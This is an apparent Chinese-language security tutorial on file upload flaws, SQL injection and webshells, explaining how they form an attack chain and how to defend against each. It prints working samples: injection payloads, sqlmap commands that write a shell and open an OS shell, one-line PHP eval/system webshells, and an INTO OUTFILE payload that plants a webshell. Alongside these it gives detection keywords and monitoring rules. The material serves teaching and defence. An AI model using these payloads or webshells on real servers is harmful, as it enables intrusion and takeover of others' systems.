文章目录
文件上传漏洞
文件上传漏洞(File Upload Vulnerability)
当Web应用允许用户上传文件但未实施充分的安全验证时,攻击者可上传恶意文件(如WebShell、病毒等),进而控制服务器或实施攻击
核心漏洞成因
1,验证缺失:
- 文件类型仅验证MIME类型(易伪造)
- 未验证文件内容签名(如PNG头)
- 未限制危险扩展名(.php, .jsp等)
2,路径控制问题:
- 允许用户控制上传路径
- 未隔离上传目录的执行权限
3,解析漏洞利用:
- Apache:shell .php .jpg 可能被解析为PHP
- IIS:shell .asp; .jpg 被当作ASP执行
- Nginx:shell .jpg/ .php 路径解析漏洞
攻击流程:
攻击者构造恶意文件 绕过前端验证 伪造Content-Type/文件头 利用解析漏洞 上传至服务器 通过URL直接访问执行
高危扩展名示例:
| 语言 | 危险扩展名 |
|---|---|
| PHP | .php .phtml .phar |
| ASP | .asp .aspx .cer |
| JSP | .jsp .jspx |
| 其他 | .htaccess(覆盖配置) |
防御方案:
1.文件验证三原则:
- 扩展名白名单(仅允许.jpg/.png等)
- 文件内容签名检测(验证真实类型)
- 重命名文件(使用随机哈希值)
2.权限控制:
c
# Nginx配置示例:禁止上传目录执行脚本
location ^~ /uploads/ {
location ~ \.php$ { deny all; } # 仅禁止上传目录的PHP执行
}3.沙箱隔离:
- 使用独立域名托管用户文件
- 云存储服务(如AWS S3)设置只读权限
SQL注入漏洞
SQL注入漏洞(SQL Injection)
攻击者通过操纵应用程序的数据库查询,插入恶意SQL代码,从而读取、修改或删除数据库内容
漏洞关键点
php
?id=1' or 1=1 --+
php
?id=1 union select database()等等
注入类型
| 类型 | 攻击方式 | 危害等级 |
|---|---|---|
| 联合查询注入 | UNION SELECT 1,@@version,3 | ⭐⭐⭐⭐ |
| 布尔盲注 | AND SUBSTR(database(),1,1)='a' | ⭐⭐⭐ |
| 时间盲注 | IF(1=1,SLEEP(5),0) | ⭐⭐⭐ |
| 报错注入 | AND GTID_SUBSET(@@version,1) | ⭐⭐⭐⭐ |
| 堆叠查询 | ; SHOW TABLES-- | ⭐⭐⭐⭐ |
自动化攻击工具
- sqlmap:自动检测并利用SQL注入
- 常用命令
bash
sqlmap -u "http://site.com/?id=1" --dbs
sqlmap -u "http://site.com/?id=1" --file-write=shell.php --file-dest=/var/www/html/shell.php --os-shell防御策略
1.参数化查询(最佳实践)
python
# Python示例
cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))2.深度防御
- 输入过滤:过滤 ' " ; --+ 等特殊字符
- 最小权限:数据库账户禁用FILE、DROP等权限
- WAF规则:拦截常见注入模式(如UNION SELECT)
WebShell
WebShell
一种驻留在Web服务器上的恶意脚本文件,为攻击者提供远程控制接口
常见WebShell功能
php
<?php
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>最经典的WebShell
一句话木马
php
<?php @eval($_POST[hhh]); ?>高级WebShell特性
1.隐蔽通信:
- 加密传输(AES/Base64)
- 伪装成图片文件(<?php ... ?> 后接图片数据)
2.多功能模块:
- 数据库管理
- 文件管理器
- 内网扫描
- 端口转发
植入路径统计
| 植入方式 | 占比 | 典型案例 |
|---|---|---|
| 文件上传漏洞 | 62% | 论坛头像上传 |
| SQL注入写入 | 28% | 利用SQL写文件功能 |
| 服务器配置漏洞 | 7% | FTP弱密码爆破 |
| 其他 | 3% | CMS供应链攻击 |
检测与清除
1.特征检测:
- 关键词:eval( ) 、system( ) 、base64_decode( )
- 文件哈希:对比官方文件校验值
2.行为监控:
bash
# Linux实时监控Web目录
auditctl -w /var/www/html -p wa -k webshell # 监控write+attribute变更3.专业工具:
- 开源:河马WebShell查杀、LMD
- 商业:阿里云云盾、腾讯云网站管家
三者的核心关联:攻击链闭环
直接投递 数据库写文件 提权/渗透 提权/渗透 文件上传漏洞 WebShell SQL注入漏洞 服务器控制
1.文件上传漏洞 → WebShell
- 直接通道:攻击者利用上传功能将WebShell伪装成图片/文档上传至服务器
- 关键点 :绕过文件类型检测(如修改Content-Type为image/jpeg)
- 结果 :通过访问上传路径直接获得服务器控制权(如 **http://site.com/uploads/shell.jpg**)
2.SQL注入漏洞 → WebShell
- 间接通道 :当注入点具备 写文件权限 (FILE 权限 + secure_file_priv宽松)时:
php
UNION SELECT "<?php system($_GET['cmd']); ?>"
INTO OUTFILE '/var/www/html/shell.php'--+- 关键点:需已知Web绝对路径(通过报错/暴力猜解获取)
- 结果 :在Web目录生成WebShell文件(如 shell.php)
3.WebShell → 扩大攻击面
- 控制服务器:通过WebShell执行命令(如 cat /etc/passwd)
- 反哺漏洞 :
读取服务器配置文件 → 发现数据库账号密码 → 发动更深度SQL注入
扫描网站源码 → 发现新上传点 → 利用文件上传漏洞二次渗透 - 横向移动:以当前服务器为跳板,攻击内网其他系统
防御关键:切断攻击链
| 攻击环节 | 防御措施 |
|---|---|
| 文件上传漏洞 | 文件内容签名校验 + 随机重命名 + 禁用上传目录执行权限 |
| SQL注入漏洞 | 参数化查询 + 数据库账户降权(禁用FILE 权限) + 设置secure_file_priv=NULL |
| WebShell植入 | 文件完整性监控(如Tripwire) + Web目录禁用写权限 + 实时扫描恶意脚本 |